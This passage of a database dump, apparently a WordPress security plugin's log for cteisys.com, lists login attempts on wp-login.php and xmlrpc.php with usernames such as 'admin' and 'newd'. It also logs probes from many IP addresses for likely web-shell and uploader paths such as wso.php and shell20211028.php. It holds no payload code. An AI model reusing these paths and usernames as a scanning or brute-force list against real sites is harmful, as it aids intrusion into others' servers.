,7,'WvMU1KECh7pJqtg8n3sAQYZ0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'',0,1666141478.1900,50,'TfuPaZNWmU4RA7Jr0GetMi3H','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141476.6343,50,'qg9Ntz5m17Ew0C2jA6OHQxIv','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141475.1486,50,'QoHUMKvLlshkjCcOGidVW2fa','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141473.4787,50,'eLIWM1GoNHhBwpyJs6YU39rD','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141471.6353,50,'vgBhEGFxbLd4sPIezUZlk6q1','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('159.65.4.107',2671838315,'',0,1666141470.3414,10,'VBmSv2PWYoDNMFgTHsujw6KI','','701|0|0|0|cteisys.com/wp-login.php',0,701,0),('159.65.4.107',2671838315,'newd',0,1666141470.3378,7,'VBmSv2PWYoDNMFgTHsujw6KI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'admin',0,1666141468.9449,51,'daFbQgxYt4VrN2Jjy6mLf9pD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'newd',0,1666141467.4118,7,'1Hqu74XyNJVUGASP63hMCWi5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'admin',0,1666141466.0733,51,'PftVT28LzSh6m3U9WvrYpi5Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.4.107',2671838315,'newd',0,1666141464.5810,7,'Lc4npTDSHue6XRdAfEw8oCgZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('110.40.244.196',1848177860,'newd',0,1666155098.8744,7,'RL90B7otPHZXMkuIagfly3re','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.5.31',3103917343,'newd',0,1666152871.5556,7,'DZQedTKuwMROgyxkiLWfbzXo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1666159526.3205,7,'Gz3RPAs5JkpTjy8KZNmtcgqE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('14.225.255.250',249692154,'newd',0,1666157320.4780,7,'ULGzasD7lNJYSbyXV6FudOfK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.210.140',2487800460,'admin',0,1666162938.6079,152,'Sg83DE7lopV9xGzQjJLAWyBU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.105.29.21',778640661,'newd',0,1666161753.6306,7,'6VYavyiDH8BzxQTRrgNftFWC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1666166245.9148,7,'rP06i15hyAGs4JvnHjCUMYRb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.82.147',3270070931,'newd',0,1666166034.6866,152,'wkLlO5KzCHZJNaTe6QXWuM3v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.233.178.41',233419305,'newd',0,1666164741.6543,152,'Taq8Ig6ly0J5HSWYE4VjndXp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1666163998.3375,7,'8eibSgP5KGckUhwuo7W3Iln9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.251.219.111',1358682991,'admin',0,1666163552.4756,152,'Q6TLXS3VFZp9iR5rwI2ekNzO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.19.208.117',336842869,'',0,1666162964.8939,55,'kaZyfr0V5mWpq48AXLPlc3IY','','19|0|0|0|cteisys.com//wp-content/plugins/wpgateway/wpgateway-webservice-new.php',0,19,0),('20.19.208.117',336842869,'',0,1666162959.8230,55,'02sMI84HYA5kfVGXh736NEog','','19|0|0|0|cteisys.com//wp-content/plugins/instabuilder2/cache/up.php',0,19,0),('151.106.35.235',2540315627,'newd',0,1666168730.3259,152,'uPD9FkXdyK3tcfNbZiUHEho4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1666168545.2719,7,'ndJqUaOZ350Xxvyl6PwIgWKz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1666167368.3768,152,'QFPRZmeygioCl50bXOJBafWs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.106.216',2806475480,'newd',0,1666166695.0620,152,'sPe4Qk0SZRiVWTKpU15A6Eou','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1666173147.3136,7,'CDmSxWbGUAIfYKi1ghpo2RMB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.0.216.181',2717964469,'newd',0,1666172272.4101,152,'lpPLVbGy4fi6Na18SwAFUK2I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.108.37.226',1047274978,'',0,1666171462.8674,55,'JaKe07qClr9cOPMEWpiIXHbD','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('62.108.37.226',1047274978,'',0,1666171462.0329,55,'G1KwTWb9ad2FJpVkXv8CtAcL','','19|0|0|0|cteisys.com/owa/auth/logon.aspx',0,19,0),('192.227.155.193',3236142017,'newd',0,1666170838.7748,7,'CfwiFgaJl2soAm65XEKtUjBh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1666170819.6228,152,'OYdnZPihTUEDzg93WS7l28FJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.233.178.41',233419305,'newd',0,1666181576.2695,152,'xiO94Mc3jrnd5JZUobGswYAu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.119.182',861501366,'',0,1666180589.2733,55,'q4RJAOda1gnuQlt2bXY3BCcW','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('51.89.119.182',861501366,'',0,1666180585.0284,55,'MqgtRw5i1vIdfGxZ3eKUXYJO','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('195.178.120.27',3283253275,'newd',0,1666177080.5806,152,'jJrZw91t3R8GBvsMXlYkgbuN','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'wadminw',0,1666176717.2932,152,'EBVjLUCmqytxW6diXnzQDlAv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1666176143.0894,51,'p2VQ9rhU4csGq5oSuknZ8PCT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.81.81.219',1599164891,'newd',0,1666175901.7509,152,'7s38Fcjny2o4GNqLV9mbEDSZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.56.26.54',2503481910,'newd',0,1666175379.8698,7,'uz9iNRjUKP36EqCSGge7MHFV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.97.88.147',2707511443,'newd',0,1666175129.7589,152,'2gLbHl3Zw8oejsWzqr91DON6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.164.193.195',3164914115,'newd',0,1666174416.5488,152,'CJ1QRUTYAF6Hwg4l8DbN2ju3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.164.193.195',3164914115,'newd',0,1666173705.6601,152,'96C7OX5tQ2vrFSsIyMmlpehP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.119.182',861501366,'',0,1666180579.8192,55,'r4KFBMkpaWNsyAGEZiShdvP9','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('51.89.119.182',861501366,'',0,1666180572.3828,55,'mRQ9YhCx8inOgBwdXZ50sjvM','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('81.88.52.210',1364735186,'admin',0,1666180042.5082,152,'CliYWbU1k8voMmS4z3pZgqwF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'admin',0,1666179259.9282,152,'368DCYh5NQmlbZKaU0SIuM1G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1666178660.9569,55,'wB26vioyafGENTFUsA1npQIH','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('85.31.46.140',1428106892,'',0,1666178657.4716,55,'iyrBfstG0O1FkoRLMuSb5QHz','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('85.31.46.140',1428106892,'',0,1666178654.5455,55,'tSBuda9fNbyLWXq2lG805vFP','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('85.31.46.140',1428106892,'',0,1666178651.7885,55,'35HKwPnpLsakXDcjyRQmVh6v','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('14.225.255.250',249692154,'newd',0,1666177609.6739,7,'yqUruTNMWOwAQgv5zdD9xn0s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.76.51.29',1347171101,'',0,1666177505.2703,55,'CamhIAGirW9EJvOf1oNRDzFP','','19|0|0|0|cteisys.com/wso.php',0,19,0),('80.76.51.29',1347171101,'',0,1666177501.1634,55,'7dAYP8vjJzgGmkCt4L5Ucl1M','','19|0|0|0|cteisys.com/wso.php',0,19,0),('80.76.51.29',1347171101,'',0,1666177498.5903,55,'IE5bX92FjQsGNZMJlkShq8KC','','19|0|0|0|cteisys.com/wp-content/uploads/index.php',0,19,0),('80.76.51.29',1347171101,'',0,1666177494.7776,55,'1Qpb0K8DPwcBHYyG3ALenM5Z','','19|0|0|0|cteisys.com/wp-content/uploads/index.php',0,19,0),('188.165.198.224',3164980960,'newd',0,1666184267.1878,7,'H2LMUrOYwIhm9f5N61yDTt7C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1666183151.5131,152,'MLmVNlTRgysWZSKw612if7F8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1666182373.9604,152,'2eC0q3jYschVa4HES7oL6BAR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.95.104.232',2371840232,'',0,1666182239.5839,55,'n3NFflj8oxOLQD6EpZ4A0Xvc','','19|0|0|0|cteisys.com/1index.php',0,19,0),('141.95.104.232',2371840232,'',0,1666182234.0011,55,'REyZQlS2bhCOWv1wJ6e0qaUg','','19|0|0|0|cteisys.com/1index.php',0,19,0),('159.89.38.20',2673419796,'',0,1666187619.6421,100,'zls9eCScIVNZKd4pXkqDLOtA','','13|0|0|0|cteisys.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('159.89.38.20',2673419796,'',0,1666187618.9716,10,'lv0TcafHDECmFxV18YIGMJRL','','707|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php.suspected',0,707,0),('159.89.38.20',2673419796,'',0,1666187618.9694,55,'lv0TcafHDECmFxV18YIGMJRL','','19|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php.suspected',0,19,0),('159.89.38.20',2673419796,'',0,1666187618.1421,55,'o3PENdDYMxgqsUyuVXbCfwR0','','19|0|0|0|cteisys.com/plugins/content/apismtp/apismtp.php',0,19,0),('159.89.38.20',2673419796,'',0,1666187617.3744,55,'9zefSbN14kcDOyj0tYFv6CGH','','19|0|0|0|cteisys.com/wp-content/plugins/apikey/apikey.php',0,19,0),('159.89.38.20',2673419796,'',0,1666187607.7080,55,'AZxjLsFIYEHQv3p5mtic27JG','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('159.89.38.20',2673419796,'',0,1666187607.7056,55,'ixG4V8FYhEqaloKIzQkjtW61','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('167.71.216.37',2806503461,'newd',0,1666187218.0037,152,'EYku0AWnyVmdF9vxLlMh87aR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1666186523.1699,7,'HSAJhfvbcEnOlUYQ8D2sPxaM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.59.243.31',2453402399,'',0,1666185709.9307,55,'G7FRDwfiyEXMn8SkgmQClUau','','19|0|0|0|cteisys.com/wp-content/vuln.php',0,19,0),('146.59.243.31',2453402399,'',0,1666185703.0231,55,'v2lkAu8EeNHFDZ9rVwPSIR0Q','','19|0|0|0|cteisys.com/wp-content/vuln.php',0,19,0),('146.59.243.31',2453402399,'',0,1666185695.4752,55,'2ujY0sdoDMBSCLpVnvZmUlFy','','19|0|0|0|cteisys.com/wp-content/wso.php',0,19,0),('146.59.243.31',2453402399,'',0,1666185674.9977,55,'42p3PYB8Q5vcgIjsCeVybLzl','','19|0|0|0|cteisys.com/wp-content/wso.php',0,19,0),('151.106.35.235',2540315627,'newd',0,1666185589.4337,152,'8CIX2bhg5TvFUMLsGzeKm7YP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.138.5',867338757,'newd',0,1666191109.7242,7,'hsoCE6nVPHcBpq7JQD4IawS1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.168.131',778414211,'newd',0,1666190634.7063,152,'fEWaQHpkwGvzIlML2DKYcArh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.115.24.165',796072101,'newd',0,1666188826.6786,7,'sq1DpHB9QbdJ782ItLEr3Xoa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1666188056.7010,152,'8QJdr7jOKuAIp1BHXbg9LV34','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.98.152.12',1734514700,'newd',0,1666194976.7744,152,'cJ6wYrRMHXtC3jkm7UahONA1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.68.167',2703443111,'newd',0,1666194091.4156,152,'YI37OrU0AJuQpNLkvSj1emVP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.142.173.121',143568249,'newd',0,1666193406.5036,7,'r17Gw9nYZRJUSB6ejFpT5Cvc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.103.173',391669677,'',0,1666198323.6448,55,'xPRNpbXjW7Tak4otgOvndYZU','','19|0|0|0|cteisys.com/1index.php',0,19,0),('23.88.103.173',391669677,'',0,1666198320.8777,10,'gFbvkJcV3SQtdnjw5iBOL2Go','','707|0|0|0|cteisys.com/1index.php',0,707,0),('23.88.103.173',391669677,'',0,1666198320.8752,55,'gFbvkJcV3SQtdnjw5iBOL2Go','','19|0|0|0|cteisys.com/1index.php',0,19,0),('23.88.103.173',391669677,'',0,1666198318.3180,55,'cni5qBth7Lv4FKpUDa0yXQmS','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('23.88.103.173',391669677,'',0,1666198315.3145,55,'exywEZO7PcQXph9fLUITRC8d','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('23.88.103.173',391669677,'',0,1666198312.8441,55,'FlRKPwtEr9xsyBVSG3nYLfCa','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('23.88.103.173',391669677,'',0,1666198307.1576,55,'AOug3cCGKl49J5vSwfZWEeXo','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('8.142.173.121',143568249,'newd',0,1666198012.9379,7,'f8TqkVsMilz4hbAQErLZHdjt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.219.45',2994789165,'wwwadmin',0,1666197808.6446,51,'zIWm6Ld1NPZC5HAxMFgi7wkr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.224.140',2733760652,'wadminw',0,1666197002.7576,51,'W7PD1LsdUGe6yMwATZFbCon5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('108.167.189.26',1822932250,'newd',0,1666195770.5260,152,'pSELvoMQeWiJOUY3Rw1lnNsI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.251.133.57',737903929,'newd',0,1666195733.9289,7,'a3xOk96oc0YKdjCu7TNWplJI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.111.30.40',1735335464,'newd',0,1666201162.9873,152,'sVScTBhv0xWIrgUdMpNXmCEf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1666200699.2865,152,'KEI9NtjSQVmsAFJgwa7TvGed','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1666200211.0558,152,'uqsNtrQv6b2TfCaGWJxR4H8n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.79.17.158',223285662,'newd',0,1666199928.9129,7,'PX3TZwo8Vyqed7xnr6U9CblI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.53.17',1364735249,'admin',0,1666199296.2983,152,'NHuzCoUXa42b98DtcS61yRWn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.179.192.195',1823719619,'admin',0,1666198864.9368,152,'qUZfydXLS4AaTzRNKmIWg5JF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1666205531.2909,7,'d60MZNbPQ14Tqm3fxhFoORJW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.129.222.91',1736564315,'newd',0,1666203686.1984,7,'Ii0KDdbmZJGseutLvTXjBV72','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1666209203.9436,7,'8nwZAO41jWSaB36iURQFICPJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'newd',0,1666207363.3662,7,'jvP1LYn2Uye5mgSRtzN3rWis','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1666212905.4426,7,'z5lkr0Eo8iyx4HuGFOPw3Itc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1666211058.4618,7,'8dSpnmj029WUCTGIQZXJsMxF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.172.66.23',346833431,'',0,1666210414.5438,55,'I19Tvd0hc6myazSr7bwjFVkN','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('47.110.72.238',795756782,'newd',0,1666214764.6954,7,'VkYBXHDcTgjwnaFehl6fMuPE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.44.8',2649107464,'newd',0,1666216619.6882,7,'y3VaD0jp24NkIqeXrMnJW5iH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.105.29.21',778640661,'newd',0,1666223960.1201,7,'y5v6DAHsmFC0B4Eb1MPXe3q8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.56',3103917112,'newd',0,1666220286.2957,7,'nFcwNlhBDdxZE5VIU7YC2rWp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1666219788.4479,51,'Eu2vXDgC6cyUtQM50HJ4ndBF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1666218456.2531,7,'ZB9r1JQXELfl4t5AKV7dhjDc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.156',3451483292,'Joyce',0,1666223115.1492,51,'NewBSuatzrDW7g8Cm50Ajsov','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.111.116.44',795833388,'newd',0,1666222123.6041,7,'zhRoL3v7igjbZ8MxedKkm1JC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.124.136',2310569096,'newd',0,1666231395.3495,7,'63RsEYxw0fNqeWZjmMFi5Jzh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.183.192',1738979264,'newd',0,1666229535.3904,7,'wEe2PgTYiUrFN0qnmJ571ApH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1666225811.9935,7,'pJGTMeZraHjwP2vC3onyRxBq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.105.73.13',795429133,'newd',0,1666227656.7922,7,'1Sdpm5ZcxuLwWFBbkVjzTioY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.248.165.195',1509467587,'newd',0,1666238098.6419,7,'E7AK4stGDwvPy2WL3OSxQ80m','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('27.72.145.33',457740577,'newd',0,1666237109.8610,7,'2gBHy3oVLviQFnXfADZs5Ex0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.44.8',2649107464,'newd',0,1666235229.1021,7,'9A2TDMP1wbfYnoKVCXLOsadh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.75.82',1152863058,'newd',0,1666263486.8734,7,'vbVXfOqITmoR3aHsElSeCMn1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1666263256.7109,152,'d9Nz3FCKsrOufp7ZXEyRknTQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.110.176.116',2406396020,'admin',0,1666245513.4966,152,'dzOHbunX0187etZTDK2LFJMQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1666244528.5347,7,'tRPFSVpdvT5fozjWscJk4wLH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.109.148.216',2523763928,'newd',0,1666242701.0294,7,'vprK8Rlzut9Z7GkHS45f6P0n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.119.182',861501366,'',0,1666263116.1323,55,'xX1qdw0SkCZMlQ8InfLU734y','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('51.89.119.182',861501366,'',0,1666263110.8695,55,'wlO08qhKTInuNZWHXkRzQU9v','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('51.89.119.182',861501366,'',0,1666263105.2330,55,'skzxOciAJTRM2tHaVhqFjw4r','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('141.95.89.75',2371836235,'newd',0,1666249024.9629,152,'5rh7OpyUoTHsda0cmXVA8NLG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1666248210.5397,7,'GmlSp6kgi1s7tn03OfQDzrCe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.104.44.58',3110612026,'newd',0,1666247949.1114,152,'c5il2ZYCgOdIXoTnbLf87Ewx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.243.26.114',1760762482,'newd',0,1666247410.3339,152,'oLEK5ND1AQysdrqhUfSMmbGn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.210',1364735186,'newd',0,1666246930.3484,152,'NFl7HEomSjVwiy6ZAr9Xgseu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.133.69',2015069509,'newd',0,1666246357.4874,7,'p2ZLFGmaBN8dhbMTPnliy45J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.204.128.101',1741455461,'admin',0,1666245944.6166,152,'1OaTtLuvkYigPUKRz02noy89','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.119.182',861501366,'',0,1666263099.4718,55,'zEPst0mDZ4IY6oJ1KGra3ef2','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('118.24.106.172',1981311660,'newd',0,1666259646.0592,7,'Qf1FANPSbqM8TovRlxEiZwnr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('114.132.250.235',1921317611,'newd',0,1666259251.5078,152,'oaj0cLFwlU1WNDtd5h7iRgpQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1666251956.9044,7,'49rsS2HJhel5kNnmXLoMEKCi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1666251837.3978,152,'yvXAkpGPoaYV5iUl2He4K3rB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1666251249.9007,152,'YKWfmpuCTkJXGqRxcyL1Vseb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.76.77.160',3108785568,'newd',0,1666250689.5060,152,'6x8uy7YTPngvjMhLSoZ0fF9d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1666250097.3240,7,'0t769jlT1oXxISwE85UgybBK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1666249560.4844,152,'bXcnLHW7Nw2tqOQvCKMhYlzg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1666259022.5470,55,'bTwOuhp5DmtliWQXz9ysd6fa','','19|0|0|0|cteisys.com/license.php',0,19,0),('80.76.51.29',1347171101,'',0,1666259014.2711,55,'bg9RBA6o2eQTswMu7YpiDzhK','','19|0|0|0|cteisys.com/license.php',0,19,0),('188.166.61.228',3165011428,'newd',0,1666255737.3369,7,'dTtOcs5JnerKulvG1RXxDBS8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.98.152.12',1734514700,'newd',0,1666255428.8266,152,'hIaO8WjZoubd0DP3gmxRNMr7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1666254854.9420,152,'DhfJ8qN7CGOa6BoPQc5bmHAd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1666253856.2395,7,'bNZYPGC1Rrp20gO3zdUwXDEt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.181.53',1739306293,'newd',0,1666253586.6213,152,'2VdNeP0JrYsjLm9Eio6CfbTz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.41.38',2065639718,'newd',0,1666252969.2973,152,'ONQcnSsLiAMuDbaflG7poRCF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1666259011.9842,55,'YBHvsED17Rd9ebIPMamfLWC2','','19|0|0|0|cteisys.com/wp-content/plugins/widget-logic/mini.php',0,19,0),('80.76.51.29',1347171101,'',0,1666259008.7689,55,'ZjrMCUt3cxXiA745Ys1SeVdm','','19|0|0|0|cteisys.com/wp-content/plugins/widget-logic/mini.php',0,19,0),('185.252.31.179',3120308147,'newd',0,1666258603.5615,152,'AVR7wGrJHcdkKsxibleg2fXt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.59.243.31',2453402399,'',0,1666258205.0036,55,'F4mIgQDxt7izKJfBEp0Hk8co','','19|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('103.74.120.192',1732933824,'newd',0,1666257979.8490,152,'JhMy3urxsO4kHwdqNZTDpmei','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1666257667.4020,7,'6Gvs8Ol7eTF2XWxw3fjLCS95','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.195.254.123',3351510651,'Joyce',0,1666257648.1142,51,'I8qz0ReNiCrtFsXjbgO7AWBP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1666256702.0843,152,'yug4lao35CeKx1LOF2I7ZnsH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1666262581.2646,152,'0najdLCYvybKolN9gmXwUJzh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.95.104.232',2371840232,'',0,1666262372.1843,55,'vocPudZ7R8MA4kNTaS3mQjH6','','19|0|0|0|cteisys.com/up.php',0,19,0),('141.95.104.232',2371840232,'',0,1666262365.7871,55,'ULa54Eo69YpgDOSXcyW82jne','','19|0|0|0|cteisys.com/up.php',0,19,0),('141.95.104.232',2371840232,'',0,1666262349.3974,55,'47QjeG6FSJpfzqoWB5E2PKhm','','19|0|0|0|cteisys.com/wp-content/plugins/ppus/up.php',0,19,0),('141.95.104.232',2371840232,'',0,1666262333.3237,55,'NhUcCXWy3BAOvuHxzoalZp2r','','19|0|0|0|cteisys.com/wp-content/plugins/ppus/up.php',0,19,0),('203.112.72.51',3413133363,'newd',0,1666261920.4239,152,'OVeq9zUB41KjrXIPJyf8nEhi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1666261591.3847,7,'uZcFisWRtT87UjG0PwELg6mJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.31.46.140',1428106892,'',0,1666261441.5695,55,'qt8X5nUYA431gjoOLzDvMT7s','','19|0|0|0|cteisys.com/V5.php',0,19,0),('85.31.46.140',1428106892,'',0,1666261435.5440,55,'NqCuyxKpvrEnjgVDOGZ75bMt','','19|0|0|0|cteisys.com/V5.php',0,19,0),('85.31.46.140',1428106892,'',0,1666261433.2461,55,'dG3R1pJH2yA5Vohzmb9BYFqL','','19|0|0|0|cteisys.com/wp-info.php',0,19,0),('85.31.46.140',1428106892,'',0,1666261423.7758,55,'pqG6y7oTQRHriIel8jAhNMzL','','19|0|0|0|cteisys.com/w